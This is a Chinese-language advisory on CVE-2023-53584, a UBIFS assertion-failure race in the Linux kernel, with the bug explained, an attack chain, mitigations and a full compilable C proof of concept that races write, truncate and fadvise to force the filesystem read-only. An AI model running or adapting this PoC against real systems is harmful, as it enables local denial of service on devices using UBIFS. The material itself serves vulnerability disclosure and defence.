CVE-2023-53584 Linux内核UBIFS文件系统断言失败漏洞

漏洞信息

漏洞编号

CVE-2023-53584

漏洞类型

断言失败/拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 UBIFS文件系统

漏洞概述

CVE-2023-53584是Linux内核UBIFS（Unsorted Block Image File System）文件系统中存在的一个高可用性影响漏洞。该漏洞位于fs/ubifs/file.c文件的ubifs_releasepage()函数中，由于代码中存在ubifs_assert(0)断言检查，在特定竞态条件下会触发断言失败，导致UBIFS文件系统切换到只读模式，从而使系统丧失写入能力，造成拒绝服务攻击。该漏洞的CVSS评分为5.5，属于中危级别，攻击向量为本地攻击，攻击者需要具备低权限即可触发，无需用户交互。漏洞的根本原因是UBIFS在处理页面释放时，对页面状态的预期与实际可能出现的状态存在不一致。具体来说，UBIFS正常情况下页面只有两种状态：Dirty+Private或Not Dirty+Not Private。但在并发操作场景下（如写入、截断和fadvise操作同时进行），页面可能进入Private但Not Dirty的异常状态，此时调用ubifs_releasepage()会触发断言失败。Linux内核开发团队已通过移除该断言并增加对异常状态的正确处理来修复此问题。

技术细节

该漏洞的技术原理涉及UBIFS文件系统中页面状态管理的竞态条件问题。UBIFS正常预期页面有两种状态组合：1) Dirty且Private（脏私有页面）；2) Not Dirty且Not Private（非脏非私有页面）。然而在以下竞态条件下，页面可能进入Private但Not Dirty的异常状态：

1. 进程PA调用ubifs_write_end()设置页面为Private状态，然后通过__set_page_dirty_nobuffers()将其标记为Dirty；
2. write_cache_pages()开始处理该页面，调用clear_page_dirty_for_io()清除Dirty标记；
3. 在ubifs_writepage()执行期间，进程PB调用do_truncation()进行截断操作，将i_size设置为0；
4. 由于page->index > end_index，writepage流程直接跳到out标签处释放页面锁，但此时页面仍保留Private标志；
5. 进程PC调用generic_fadvise()，通过invalidate_inode_page()->try_to_release_page()调用ubifs_releasepage()；
6. ubifs_releasepage()中的ubifs_assert(c, 0)断言触发，文件系统切换到只读模式。

此漏洞利用需要本地低权限访问权限，攻击者可以通过精心设计的并发I/O操作（包括write、truncate和fadvise64系统调用）来触发该竞态条件。触发后文件系统将变为只读模式，影响系统的可用性。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地低权限访问权限，并确认目标系统使用UBIFS文件系统（如嵌入式设备、闪存存储等）

STEP 2

步骤2

攻击者创建一个测试文件，并启动多个并发线程分别执行write（写入）、truncate（截断）和posix_fadvise（页面失效）操作

STEP 3

步骤3

通过精心设计的时序，使页面进入Private但Not Dirty的异常状态（write线程设置Private+Dirty后被truncate中断清除Dirty标记）

STEP 4

步骤4

fadvise线程调用invalidate_inode_page触发ubifs_releasepage()，其中的ubifs_assert(c, 0)断言失败

STEP 5

步骤5

UBIFS文件系统切换到只读模式（ubifs_ro_mode），系统丧失写入能力，造成拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2023-53584 PoC - Trigger UBIFS assertion failure via concurrent operations
 * This PoC demonstrates triggering the ubifs_assert(0) in ubifs_releasepage()
 * by racing write, truncate, and fadvise operations on a UBIFS filesystem.
 *
 * Compile: gcc -o poc poc.c -lpthread
 * Run on UBIFS mounted filesystem as low-privilege user.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/stat.h>

#define FILE_PATH "/mnt/ubifs/test_file"
#define BUF_SIZE 4096
#define NUM_THREADS 3
#define ITERATIONS 1000

void *writer_thread(void *arg) {
    int fd;
    char buf[BUF_SIZE];
    memset(buf, 'A', BUF_SIZE);

    for (int i = 0; i < ITERATIONS; i++) {
        fd = open(FILE_PATH, O_WRONLY | O_CREAT, 0644);
        if (fd < 0) continue;
        write(fd, buf, BUF_SIZE);
        close(fd);
    }
    return NULL;
}

void *truncator_thread(void *arg) {
    for (int i = 0; i < ITERATIONS; i++) {
        truncate(FILE_PATH, 0);
    }
    return NULL;
}

void *fadvise_thread(void *arg) {
    int fd;

    for (int i = 0; i < ITERATIONS; i++) {
        fd = open(FILE_PATH, O_RDONLY);
        if (fd < 0) continue;
        /* posix_fadvise triggers invalidate_inode_page -> try_to_release_page */
        posix_fadvise(fd, 0, BUF_SIZE, POSIX_FADV_DONTNEED);
        close(fd);
    }
    return NULL;
}

int main() {
    pthread_t threads[NUM_THREADS];

    /* Create initial file */
    int fd = open(FILE_PATH, O_WRONLY | O_CREAT, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    close(fd);

    printf("Starting race condition exploit for CVE-2023-53584...\n");

    /* Launch concurrent threads to trigger the race */
    pthread_create(&threads[0], NULL, writer_thread, NULL);
    pthread_create(&threads[1], NULL, truncator_thread, NULL);
    pthread_create(&threads[2], NULL, fadvise_thread, NULL);

    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("Done. Check dmesg for UBIFS assertion failure.\n");
    return 0;
}

影响范围

Linux kernel < 5.16 (包含rc版本)

Linux kernel 5.16.0-rc5及之前的版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制非特权用户对UBIFS文件系统的并发I/O操作权限；2）监控系统日志（dmesg）以便及时发现UBIFS断言失败事件；3）避免在UBIFS文件系统上同时进行大量并发写入、截断和fadvise操作；4）对于关键业务系统，考虑使用其他文件系统（如ext4、f2fs）替代UBIFS；5）使用cgroups或资源控制限制单个用户的I/O并发数，减少竞态条件触发的概率。